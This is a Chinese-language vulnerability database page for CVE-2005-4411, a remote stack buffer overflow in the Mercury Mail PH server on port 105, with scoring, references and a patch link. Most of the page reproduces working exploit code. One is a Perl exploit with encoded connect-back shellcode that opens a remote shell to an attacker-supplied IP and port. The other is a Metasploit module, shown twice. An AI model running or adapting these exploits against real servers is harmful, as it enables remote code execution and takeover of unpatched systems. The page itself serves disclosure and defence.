CVE-2005-4411
CVSS7.5
发布时间 :2005-12-20 06:03:00
修订时间 :2008-09-10 15:52:25
NMCOEPS    

[原文]Buffer overflow in Mercury Mail Transport System 4.01b allows remote attackers to execute arbitrary code via a long request to TCP port 105.


[CNNVD]Mercury/32 PH Server模块远程缓冲区溢出漏洞(CNNVD-200512-457)

        Mercury IMAP是一款邮件传送系统。
        Mercury IMAP的邮箱名服务实现上存在缓冲区溢出漏洞,远程攻击者可以利用此漏洞以进程权限在系统上执行任意指令,从而控制服务器。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4411
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4411
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-457
(官方数据源) CNNVD

- 其它链接及资源

http://securitytracker.com/id?1015374
(UNKNOWN)  SECTRACK  1015374
http://xforce.iss.net/xforce/xfdb/23669
(UNKNOWN)  XF  mercury-mailboxnameservice-bo(23669)
http://www.securityfocus.com/bid/16396
(UNKNOWN)  BID  16396
http://www.osvdb.org/22103
(UNKNOWN)  OSVDB  22103
http://secunia.com/advisories/18611
(UNKNOWN)  SECUNIA  18611
http://milw0rm.com/exploits/1375
(UNKNOWN)  MILW0RM  1375

- 漏洞信息

Mercury/32 PH Server模块远程缓冲区溢出漏洞
高危 缓冲区溢出
2005-12-20 00:00:00 2005-12-20 00:00:00
远程  
        Mercury IMAP是一款邮件传送系统。
        Mercury IMAP的邮箱名服务实现上存在缓冲区溢出漏洞,远程攻击者可以利用此漏洞以进程权限在系统上执行任意指令,从而控制服务器。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.pmail.com/overviews/ovw_mercury.htm

- 漏洞信息 (1375)

Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER) (EDBID:1375)
windows remote
2005-12-16 Verified
105 Kingcope
N/A [点击下载]
### mercurysexywarez
### Okayokay THiS iS 0DAY!!!
### Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT
### (PH SERVER)
### since me and my folks didn't find enough wild targets,
### i release this pretty warez to the public :PP
### kcope [kingcope(at)gmx.net] in 2005! JUUAREZ!
### Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!
###################################################################
use IO::Socket;
# 316 bytes
$cbsc =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA"
."\xEB\x05\xE8\xEB\xFF\xFF\xFF"
."\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x49\x82\xCE\x49"
."\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x59\xC2\xC2\xC2"
."\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\x9D\x96\x3D\xD4\x49"
."\x2A\xA8\xC6\x9B\x2A\x40\xC2\xC2\xC2\x20\x3B\x43\x2E\x52\xC3\xC2"
."\xC2\x96\xAA\xC3\xC3\xC2\xC2\x3D\x94\xD2\x92\x92\x92\x92\x82\x92"
."\x82\x92\x3D\x94\xD6\x49\x1A\xAA\xBD\xC2\xC2\xC3\xAA\xC0\xC2\xC2"
."\xF7\x49\x0E\xA8\xD2\x93\x91\x3D\x94\xDA\x47\x02\xB7\x88\xAA\xA1"
."\xAF\xA6\xC2\x4B\xA4\xF2\x41\x2E\x96\x4F\xFE\xE6\xA8\xD7\x9B\x69"
."\x20\x3F\x04\x86\xE6\xD2\x86\x3C\x86\xE6\xFF\x4B\x9E\xE6\x8A\x4B"
."\x9E\xE6\x8E\x4B\x9E\xE6\x92\x4F\x86\xE6\xD2\x96\x92\x93\x93\x93"
."\xA8\xC3\x93\x93\x3D\xB4\xF2\x93\x3D\x94\xC6\x49\x0E\xA8\x3D\x3D"
."\xF3\x3D\x94\xCA\x91\x3D\x94\xDE\x3D\x94\xCE\x93\x94\x49\x87\xFE"
."\x49\x96\xEA\xBA\xC1\x17\x90\x49\xB0\xE2\xC1\x37\xF1\x0B\x8B\x83"
."\x6F\xC1\x07\xF1\x19\xCD\x7C\xD2\xF8\x14\xB6\xCA\x03\x09\xCF\xC1"
."\x18\x82\x29\x33\xF9\xDD\xB7\x25\x98\x49\x98\xE6\xC1\x1F\xA4\x49"
."\xCE\x89\x49\x98\xDE\xC1\x1F\x49\xC6\x49\xC1\x07\x69\x9C\x9B\x01"
."\x2A\xC2\x3D\x3D\x3D\x4C\x8C\xCC\x2E\xB0\x3C\x71\xD4\x6F\x1B\xC7"
."\x0C\xBC\x1A\x20\xB1\x09\x2F\x3E\xF9\x1B\xCB\x37\x6F\x2E\x3B\x68"
."\xA2\x25\xBB\x04\xBB";

$numtargets = 1;

@targets =
(
 ["Mercury Mail Transport System 4.01b Win2k SP4/WinXP SP2", "\x83\xf2\x41\x00"]
);

print "Okayokay THiS iS 0DAY!!!\n";
print "Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT\nkcope [kingcope(at)gmx.net] in 2005! JUUAREZ!\n";
print "Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!\n";
if ($#ARGV ne 3) {
       print "usage: mecurysexywarez.pl target targettype yourip yourport\n\n";
   for ($i=0; $i<$numtargets; $i++) {
        print " [".$i."]...". $targets[$i][0]. "\n";
   }
       exit(0);
}

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                             PeerPort => '105',
                             Proto    => 'tcp') || die("Oh my godess! Port not open! Pleeze open and try again :PP");
$tt=$ARGV[1];
$cbip=$ARGV[2];
$cbport=$ARGV[3];

($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
$a1 = chr(ord($a1) ^ 0xc2);
$a2 = chr(ord($a2) ^ 0xc2);
$a3 = chr(ord($a3) ^ 0xc2);
$a4 = chr(ord($a4) ^ 0xc2);
substr($cbsc, 111, 4, $a1 . $a2 . $a3 . $a4);

($p1, $p2) = split(//, reverse(pack("s", $cbport)));
$p1 = chr(ord($p1) ^ 0xc2);
$p2 = chr(ord($p2) ^ 0xc2);
substr($cbsc, 118, 2, $p1 . $p2);

$pad="A" x 408 . $cbsc . "\x90\x90\xeb\x04";
$pad2="A" x 440;

$ret=$targets[$tt][1];
$x=$pad.$ret."JJJJKKKKLLLLMMMMNNNNOOOOPPPP\xe9\x87\xfe\xff\xff".$pad2;
print $sock "$x\r\n";

while (<$sock>) {
       print;
}

# milw0rm.com [2005-12-16]
		

- 漏洞信息 (16419)

Mercury/32 <= v4.01b PH Server Module Buffer Overflow (EDBID:16419)
windows remote
2010-06-15 Verified
0 metasploit
N/A [点击下载]
##
# $Id: mercury_phonebook.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mercury/32 <= v4.01b PH Server Module Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in
				Mercury/32 <= v4.01b PH Server Module. This issue is
				due to a failure of the application to properly bounds check
				user-supplied data prior to copying it to a fixed size memory buffer.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9525 $',
			'References'     =>
				[
					[ 'CVE', '2005-4411' ],
					[ 'OSVDB', '22103'],
					[ 'BID', '16396' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
					[ 'Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4 } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Dec 19 2005',
			'DefaultTarget' => 0))

		register_options([ Opt::RPORT(105)], self)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit =  rand_text_alphanumeric(224, payload_badchars)
		sploit << payload.encoded + "\xeb\x06" + make_nops(2)
		sploit << [target.ret].pack('V') + [0xe8, -450].pack('CV') + "\r\n"

		sock.put(sploit)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83209)

Mercury/32 <= v4.01b PH Server Module Buffer Overflow (PacketStormID:F83209)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2005-4411
[点击下载]

This Metasploit module exploits a stack-based buffer overflow in Mercury/32 <= v4.01b PH Server Module. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mercury/32 <= v4.01b PH Server Module Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack-based buffer overflow in
				Mercury/32 <= v4.01b PH Server Module. This issue is
				due to a failure of the application to properly bounds check
				user-supplied data prior to copying it to a fixed size memory buffer.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					[ 'CVE', '2005-4411' ],
					[ 'OSVDB', '22103'],
					[ 'BID', '16396' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
					[ 'Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4 } ],
				],

			'Privileged'     => true,

			'DisclosureDate' => 'December 19 2005',

			'DefaultTarget' => 0))

			register_options([ Opt::RPORT(105)], self)

	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit =  rand_text_alphanumeric(224, payload_badchars)
		sploit << payload.encoded + "\xeb\x06" + make_nops(2)
		sploit << [target.ret].pack('V') + [0xe8, -450].pack('CV') + "\r\n"

		sock.put(sploit)
		
		handler
		disconnect
	end

end
    

- 漏洞信息

22103
Mercury Mail Transport System ph Server Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

A buffer overflow exists in Mercury Mail. The ph server fails to validate string data received on TCP port 105 resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-12-16 Unknow
2005-12-16 2006-01-01

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, David Harris has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Mercury Mail Remote Mailbox Name Service Buffer Overflow Vulnerability
Boundary Condition Error 16396
Yes No
2006-01-26 12:00:00 2008-12-11 11:41:00
kcope <kingcope@gmx.net> discovered this issue.

- 受影响的程序版本

David Harris Mercury (win32 version) 4.0 1b
David Harris Mercury (win32 version) 4.0 1a

- 漏洞讨论

Mercury Mail is prone to a remote buffer-overflow vulnerability in its mailbox name service. This issue occurs because the application fails to properly bounds-check user-supplied input before copying it to a finite-sized memory buffer.

Exploiting this vulnerability allows remote attackers to execute arbitrary machine code with SYSTEM privileges in the context of the affected server process.

Mercury Mail 4.01b is affected; other versions may also be affected.

- 漏洞利用

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following exploit is available:

- 解决方案

The vendor has released a patch to address this issue.


David Harris Mercury (win32 version) 4.0 1b

David Harris Mercury (win32 version) 4.0 1a

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站